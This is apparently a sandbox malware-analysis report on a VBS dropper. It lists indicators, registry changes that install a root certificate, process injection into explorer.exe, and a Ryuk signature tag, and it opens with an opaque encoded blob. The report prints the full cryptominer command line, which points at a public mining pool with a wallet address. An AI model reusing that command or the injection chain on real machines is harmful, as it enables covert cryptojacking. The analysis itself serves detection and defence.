2iHykS5MY7RAAmdwC4ht5SUHqkcReROrdL96V7+E3hxSEtd39hiWhyGGkM3QLl/F6P0uKVskm0MvSPEOW7yM+gTeXtEjCvIEVpwjkKJ4b3P+hrAEMZbjI74g1cZZzewCffWqG3tmbZodv7WEVP59XxINnUV402gA9p3E9PlIKNtrn484D6szTvmE/ZbIhtFcmxejswyF8AUvz/irw2Zd0IlJr/zrDOwjK5igC5Hp4ushR0MyBWvqVEPJ5y0PSr9X0kiuyaAr6lQa+7UZK0t/o5T7o0kNqoVoshBJzN0S5fh+DtrSFbl2lSUowtW1cS0rLLP4gYQJEPMWnqhyJW95LtYjgii6ExbWTJ6t/x3JMKMXb+TlqmiWhyGGkM3QLl/F6P0uKVscxmdMnbF+H3Wyck+dcR+C/tcHhHajylOcAoCzDShlnHJdXS4Pmnfp/tOeipNc1oMZ1AolcqctWDIs6YALIDAGwFb2xcuV4fcbJzR63xF5LM4HSGKUqqwxaEHtuCauTji81ZsG+ak+TGD+ZgRBSKvp9XswZFl+DUgrKkA62vHafiNS/hR6A1wimSRpA8I+Q/ft2lcydCEgJHLvyltCqTwuwy56xYgqWbXzIn74O/eimEBv1nGY6Veg2SFdoQW6OO1q6DC6wXyfeyWAmGjYZ3FMrqPIoDfJ/5JbBYaMildXwsq+ggO8l8nnsFgpxIW2dBz/KgJ0uAOY5ZM7t+Wl8aq4w7SUJyfDkYXh/423c31S+sq+ggO8l8nnsFgpxIW2dBzfXn3Zlr24rOwUSVjQjPJ2eZFnKlh8BalFh6RrdcYAzS9ZiLGgvyL36etzadTzQteq6DC6wXyfeyWAmGjYZ3FMnrxORhACEXDYyiy2Nyg1sXMa3AGC72lyrJ8UbCOh1GkjnT+SVN+YgxXU3IRCSK+RpqPIoDfJ/5JbBYaMildXwM2HYKA0yBql20a4UfWhHNfxodDYIsbXKvmwTtJ4EWbQ2zLlCu2ylpAG8DCzYKeJrMqiOdBShtC8ZJWPZcE+76Ge4Nx0nWqQcBIPT4Qiig/kHjaD1ifwUELZegIElh0k1V+/qbpsuje4+3Yh1t+kUPOxodDYIsbXKvmwTtJ4EWbQGj2Nghwudp8aCP1mgTYtBpt3bv6rGV+Onknk0uLV/tjNsJGRp0nLdygfG0qr4Hd5v0eZk6Tej4BddKmRfQzWwK+bT7ai7+0GAMcKNylarAixodDYIsbXKvmwTtJ4EWbQiiM6y0skgXfs5Fmf5qjoQ/W

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

Blocklisted process makes network request 3 IoCs

flow	pid	Process
7	1104	WScript.exe
9	1104	WScript.exe
11	1104	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
752	bin.txt

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1596-67-0x0000000140000000-0x0000000140717000-memory.dmp	upx
behavioral1/memory/1596-70-0x0000000140000000-0x0000000140717000-memory.dmp	upx

Loads dropped DLL 1 IoCs

pid	Process
1104	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 752 set thread context of 1596	752	bin.txt	33

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e309000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	WScript.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	1596	explorer.exe
Token: SeLockMemoryPrivilege	1596	explorer.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1104 wrote to memory of 752	1104	WScript.exe	31
PID 1104 wrote to memory of 752	1104	WScript.exe	31
PID 1104 wrote to memory of 752	1104	WScript.exe	31
PID 752 wrote to memory of 1596	752	bin.txt	33
PID 752 wrote to memory of 1596	752	bin.txt	33
PID 752 wrote to memory of 1596	752	bin.txt	33
PID 752 wrote to memory of 1596	752	bin.txt	33
PID 752 wrote to memory of 1596	752	bin.txt	33
PID 752 wrote to memory of 1596	752	bin.txt	33
PID 752 wrote to memory of 1596	752	bin.txt	33

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SiggiaW.vbs"
1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1104
- C:\Users\Public\bin.txt
  C:\Users\Public\bin.txt
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:752
- - C:\Windows\explorer.exe
    C:\Windows\explorer.exe -B --donate-level=1 -a cryptonight --url=pool.supportxmr.com:5555 -u 8AsWuFbYMBQQFKBWQDAMiqgZnQLSQjB7p6hrYwxdocCvFdgJjYjckDiLGTEzwGRidoTZjnobmuwChgcNawxgur9f7i9fb88 -p x -R --variant=-1 -t 1 --max-cpu-usage=50
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1596

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/752-64-0x000000013FC60000-0x000000013FC61000-memory.dmp

Filesize
4KB

Download
memory/752-66-0x00000000001C0000-0x00000000001C2000-memory.dmp

Filesize
8KB

Download
memory/1596-67-0x0000000140000000-0x0000000140717000-memory.dmp

Filesize
7.1MB

Download
memory/1596-69-0x0000000000170000-0x0000000000184000-memory.dmp

Filesize
80KB

Download
memory/1596-70-0x0000000140000000-0x0000000140717000-memory.dmp

Filesize
7.1MB

Download
memory/1596-71-0x0000000001CF0000-0x0000000001D10000-memory.dmp

Filesize
128KB

Download

Analysis

Sharing